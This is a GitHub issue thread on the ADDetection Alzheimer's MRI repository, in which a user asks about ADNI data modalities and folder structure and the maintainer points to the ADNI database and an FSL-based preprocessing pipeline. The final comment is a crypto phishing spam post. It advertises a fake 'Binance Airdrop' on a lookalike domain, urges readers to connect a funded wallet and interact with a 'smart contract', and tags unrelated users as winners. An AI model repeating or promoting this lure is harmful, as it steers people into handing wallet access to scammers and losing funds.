### ISSUE TITLE
Excuse me, may I ask you some questions?

### ISSUE THREAD

**Issue by WJ0315** [quqixun/ADDetection#4]
1. How do we get the different modal of MRI, such as T1, T2. T1-CE and T2-Flair.
2. In addition, the code prompts FileNotFoundError: No such file or no access: 'E:\ADDetectionmaster\data/adni_subj\AD\036_S_0577 'How do I get the 0/1/2/3 folder in 036_S_0577? 
3.In your code, can we use the original data set on ADNI directly?
Thank you very much!

**Comment by quqixun** [comment]
Just several samples are provided in this repo. 
Whole dataset is too large to be uploaded here.

Dataset is available here: http://adni.loni.usc.edu/  
After getting access to this dataset, you should search AD and NC samples in the database and download them.  
Put data set in data directory as https://github.com/quqixun/ADDetection/blob/master/src/add_segment.py#L39

**Comment by WJ0315** [comment]
Thank you for your reply. How can I get T1, T2. T1-CE and T2-Flair? Is the result of your code running, or is it processed through FreeSurfer?

I have downloaded the dataset, but for the same number, there will be different images in different years, such as 036_S_0577, with two images in 2007 and 2008. How do I choose?

**Comment by WJ0315** [comment]
Thank you for your reply. How can I get T1, T2. T1-CE and T2-Flair? Is the result of your code running, or is it processed through FreeSurfer?

I have downloaded the dataset, but for the same number, there will be different images in different years, such as 036_S_0577, with two images in 2007 and 2008. How do I choose?

**Comment by quqixun** [comment]
I did not use multi-modal MRI, but segment TI volume to gray matter, white matter and csf using FSL.  
I forgot what files in one subject's dir, could you show me an example?  
Now, I have no access to dataset.

**Comment by WJ0315** [comment]
![1](https://user-images.githubusercontent.com/52818664/69513677-8aadcd80-0f83-11ea-866f-70c4bc108d80.png)
![2](https://user-images.githubusercontent.com/52818664/69513678-8b466400-0f83-11ea-9bde-6c0a456de460.png)
![3](https://user-images.githubusercontent.com/52818664/69513680-8b466400-0f83-11ea-812b-a1ddd1457531.png)

**Comment by quqixun** [comment]
The data I used was quit different with yours.  
Here is a short description of the dataset I used.  
https://github.com/quqixun/BrainPrep/tree/master/data

This repo is a pipeline to preprocess the ADNI dataset.

**Comment by WJ0315** [comment]
Thank you very much, I wii try again.

**Comment by karmalntest** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @stanxii, @murilokrugner, @nmazing, @martin-ly, @dexhunter, @nishanthvijayan, @gruberdev
